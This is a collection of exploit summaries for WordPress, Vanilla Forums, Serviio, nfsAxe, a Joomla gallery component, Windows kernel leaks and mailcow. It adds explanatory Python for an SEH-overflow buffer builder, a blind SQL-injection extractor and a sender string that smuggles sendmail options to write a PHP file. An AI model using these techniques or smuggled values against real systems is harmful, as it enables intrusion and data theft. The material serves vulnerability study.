This module exploits a command injection vulnerability in WordPress 4.6 (with Exim as the MTA) by passing a spoofed Host header through to PHPMailer, the mail-sending library bundled with WordPress. A valid WordPress username is required. Because the Host header is altered, exploitation is limited to the default virtual host, and it assumes the header isn't mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 and later, the server may have HttpProtocolOptions set to Strict, which rejects a Host header containing parentheses and makes exploitation unlikely.
This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service exposes a REST API which does not require authentication. The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands. This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
When accessing an out-of-process (OOP) COM object through IRemUnknown2, the locally unmarshaled proxy can be for a different interface from the one requested by QueryInterface, resulting in a type confusion that can lead to elevation of privilege (EoP).
This exploit demonstrates a stack-based buffer overflow in the LabF nfsAxe 3.7 FTP Client's handling of user-supplied input. By sending a specially crafted FTP command, an attacker can overwrite the structured exception handler (SEH) record, take control of the program's execution flow, and execute arbitrary code on the target system.
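To make the SEH-overwrite layout concrete, here is an added Python helper (not the original exploit code) that builds the classic buffer for this class of bug: junk up to the handler record, a 4-byte nSEH holding a short jump, the SEH pointer aimed at a POP/POP/RET gadget, and the payload after it. The offset, gadget address and shellcode below are placeholders, not the real values for nfsAxe 3.7, which the entry does not give. It also refuses any buffer containing the bytes an FTP command line cannot carry (NUL, CR, LF), the check a practitioner runs before sending anything.

```python
import struct

# Bytes an FTP command line cannot carry: NUL ends the C string on the client
# side, CR/LF end the command. Any of them in the buffer truncates the overflow.
FTP_BADCHARS = b"\x00\x0d\x0a"

# Placeholder values (assumptions, not the real nfsAxe 3.7 numbers).
OFFSET_TO_SEH = 1000          # hypothetical distance to the nSEH field
POP_POP_RET = 0x1001A3B5      # hypothetical POP/POP/RET in a non-SafeSEH module
SHELLCODE = b"\xcc" * 16      # constructed stand-in: 16 INT3 breakpoints


def short_jmp(distance: int) -> bytes:
    """EB xx: 2-byte short jump; displacement is relative to the next instruction."""
    if not -128 <= distance <= 127:
        raise ValueError("short jmp displacement out of range")
    return b"\xeb" + struct.pack("<b", distance)


def find_badchars(data: bytes, badchars: bytes = FTP_BADCHARS) -> list[int]:
    """Offsets at which any forbidden byte appears."""
    return [i for i, b in enumerate(data) if b in badchars]


def seh_address_ok(handler: int) -> bool:
    """A handler address is only usable if none of its 4 bytes is a bad char."""
    return not find_badchars(struct.pack("<I", handler))


def build_seh_buffer(offset: int, handler: int, shellcode: bytes, total: int = 1500) -> bytes:
    """Lay out: [junk][nSEH: jmp short +6][SEH: POP/POP/RET][NOP sled][shellcode][filler].

    When the overwritten handler runs, POP/POP/RET lands execution on nSEH; the
    short jump there hops over the 4-byte handler pointer into the NOP sled.
    """
    nseh = short_jmp(6) + b"\x90\x90"           # jmp +6 skips 2 pad bytes + 4-byte SEH
    seh = struct.pack("<I", handler)            # little-endian 32-bit address
    body = b"A" * offset + nseh + seh + b"\x90" * 16 + shellcode
    if len(body) > total:
        raise ValueError("payload does not fit in the buffer")
    buf = body + b"C" * (total - len(body))
    bad = find_badchars(buf)
    if bad:
        raise ValueError(f"bad characters at offsets {bad}")
    return buf


def ftp_command(verb: bytes, argument: bytes) -> bytes:
    """Wrap the buffer in one FTP command line, as the client would send it."""
    return verb + b" " + argument + b"\r\n"


if __name__ == "__main__":
    buf = build_seh_buffer(OFFSET_TO_SEH, POP_POP_RET, SHELLCODE)
    line = ftp_command(b"USER", buf)
    print(f"{len(line)} bytes; nSEH at {OFFSET_TO_SEH}, SEH at {OFFSET_TO_SEH + 4}")
```

The real work for a new target is finding the offset (a cyclic pattern and a debugger) and a POP/POP/RET gadget in a module without SafeSEH whose address survives the bad-character filter; the builder only encodes what is known.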
This vulnerability allows an attacker to perform blind SQL injection against the Joomla component Pony Gallery, version 1.5 and below. By manipulating the 'catid' parameter of the 'viewcategory' function, an attacker can inject SQL and retrieve sensitive information from the database without ever seeing query output directly.
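The boolean inference behind a blind injection on an integer parameter such as catid, as an added Python example (not the Pony Gallery component's code): the schema and table names are constructed for illustration, the vulnerable handler concatenates catid into the query, and the only feedback is whether a category renders. An attacker recovers a value one character per request with binary search; the fixed handler casts and binds the parameter and rejects the same input outright. SQLite's unicode() stands in for MySQL's ASCII().

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema for illustration; not the component's real tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO categories VALUES (1, 'holidays'), (2, 'cars');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (62, 'admin', 's3cret');
    """)
    return db


def viewcategory_vulnerable(db: sqlite3.Connection, catid: str) -> bool:
    """Integer parameter concatenated straight into the WHERE clause: no quotes
    need breaking out of, so 'catid=1 AND (...)' is accepted as-is. Returns
    True when a category renders, False for an empty page: that single bit is
    all the attacker gets, hence 'blind'."""
    row = db.execute("SELECT name FROM categories WHERE id=" + catid).fetchone()
    return row is not None


def viewcategory_fixed(db: sqlite3.Connection, catid: str) -> bool:
    """Cast first, then bind: the payload never reaches the SQL parser."""
    row = db.execute("SELECT name FROM categories WHERE id=?", (int(catid),)).fetchone()
    return row is not None


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the string value of `subquery` through a boolean oracle.

    `oracle(catid)` answers True/False exactly like the vulnerable page does.
    Each character costs about 7 requests (binary search over printable ASCII).
    """
    result = ""
    for pos in range(1, max_len + 1):
        # Is there a character at this position at all?
        if not oracle(f"1 AND length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() is SQLite; on MySQL this would be ASCII()
            if oracle(f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def fixed_rejects(catid: str) -> bool:
    """True when the parameterised handler refuses the input outright."""
    try:
        viewcategory_fixed(make_db(), catid)
    except ValueError:
        return True
    return False


def demo() -> str:
    db = make_db()
    secret = "(SELECT password FROM users WHERE username='admin')"
    return blind_extract(lambda catid: viewcategory_vulnerable(db, catid), secret)


if __name__ == "__main__":
    print("extracted:", demo())
    print("fixed handler rejects payload:", fixed_rejects("1 AND 1=1"))
```

The length probe is what stops extraction cleanly; without it the loop would keep returning chr(32) past the end of the value and the attacker could not tell where the string ends.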
It is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 indirectly through the win32k!NtUserCreateWindowEx system call.
The handler of the nt!NtTraceControl system call discloses portions of uninitialized pool memory to user-mode clients on Windows 10 systems. The uninitialized values are copied back to user-mode, which can potentially expose sensitive information.
CSRF vulnerabilities in mailcow 0.14 allow an attacker who lures an authenticated mailcow user into loading a crafted page to perform actions in that user's session, such as resetting the admin password, adding an arbitrary admin, and deleting domains.
This exploit takes advantage of a format string bug in a vulnerable SMTP server to execute a malicious command on the target system. The command to execute cannot exceed 90 characters.
This exploit achieves remote code execution in Vanilla Forums version 2.3 by chaining two vulnerabilities: CVE-2016-10033 (PHPMailer RCE) and CVE-2016-10073 (Host header injection). The exploit code can be found at https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh. More information can be found in the full advisory at https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html. Other related advisories include: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html and https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html. For more details on the vulnerability and exploitation, refer to the white-paper 'Pwning PHP mail() function For Fun And RCE' at https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html.
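The shell word-splitting that turns a crafted sender address into extra sendmail options (CVE-2016-10033, which both the WordPress entry above and this Vanilla Forums entry rely on), as an added Python example rather than code from PHPMailer, WordPress or Vanilla. php_escapeshellcmd() is a port of PHP's escapeshellcmd(), which backslash-escapes shell metacharacters but not spaces and leaves paired quotes untouched; shlex.split mirrors what /bin/sh does when PHP's mail() hands the command line to popen(). The SENDER string is constructed here in the shape the linked white-paper describes and is not a working payload for either application. The escapeshellarg() variant shows why quoting the whole value as one argument closes the hole. wp_default_from() is modelled on wp_mail()'s default From address, which is how the Host header becomes the sender in the WordPress case; that address additionally has to pass PHPMailer's address validation, which is why the WordPress module's Host header relies on parentheses, the characters Apache's Strict mode rejects.

```python
import shlex

# Port of PHP's escapeshellcmd(): backslash-escapes shell metacharacters, but
# NOT whitespace, and keeps a *paired* " or ' as-is. That is enough for a
# sender string to be split by /bin/sh into several sendmail arguments.
PHP_SHELL_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellcmd(s: str) -> str:
    out = []
    closing = None                     # index of the quote that closes an open pair
    for i, c in enumerate(s):
        if c in ('"', "'"):
            if closing is None:
                j = s.find(c, i + 1)
                if j == -1:
                    out.append('\\')   # unpaired quote: escaped
                else:
                    closing = j        # opening quote of a pair: kept as-is
            elif i == closing:
                closing = None         # closing quote: kept as-is
            else:
                out.append('\\')       # the other quote type inside a pair: escaped
            out.append(c)
        elif c in PHP_SHELL_META:
            out.append('\\' + c)
        else:
            out.append(c)
    return ''.join(out)


def php_escapeshellarg(s: str) -> str:
    """PHP's escapeshellarg(): single-quote the whole value as one word."""
    return "'" + s.replace("'", "'\\''") + "'"


def sendmail_argv(sender: str, escape) -> list[str]:
    """What PHP's mail() effectively runs: sendmail_path plus -f<sender>, as a
    single command line given to /bin/sh. shlex.split performs the shell's
    word splitting and quote removal."""
    return shlex.split("/usr/sbin/sendmail -t -i -f" + escape(sender))


def wp_default_from(server_name: str) -> str:
    """wp_mail()'s default From: 'wordpress@' + SERVER_NAME with 'www.' stripped,
    i.e. the Host header the client sent."""
    sitename = server_name.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return "wordpress@" + sitename


# Constructed sender in the shape the white-paper describes: the paired quotes
# survive escapeshellcmd(), the spaces are never escaped, and the MTA receives
# -oQ (queue directory) and -X (log file) options it was never meant to get.
SENDER = '"attacker\\" -oQ/tmp/ -X/var/www/cache/phpcode.php  "@example.com'


def injected_options(sender: str) -> list[str]:
    """Arguments that reach sendmail beyond the expected -t -i -f<sender>."""
    return sendmail_argv(sender, php_escapeshellcmd)[4:]


if __name__ == "__main__":
    print("escapeshellcmd:", sendmail_argv(SENDER, php_escapeshellcmd))
    print("escapeshellarg:", sendmail_argv(SENDER, php_escapeshellarg))
    print("From derived from Host:", wp_default_from("www.Victim.example"))
```

With escapeshellcmd() the shell sees four extra words after -f; with escapeshellarg() the whole sender is one argv element and sendmail simply gets an odd-looking envelope address. The WordPress/Exim path in the module above uses the same splitting but a different MTA option set, and is not reproduced here.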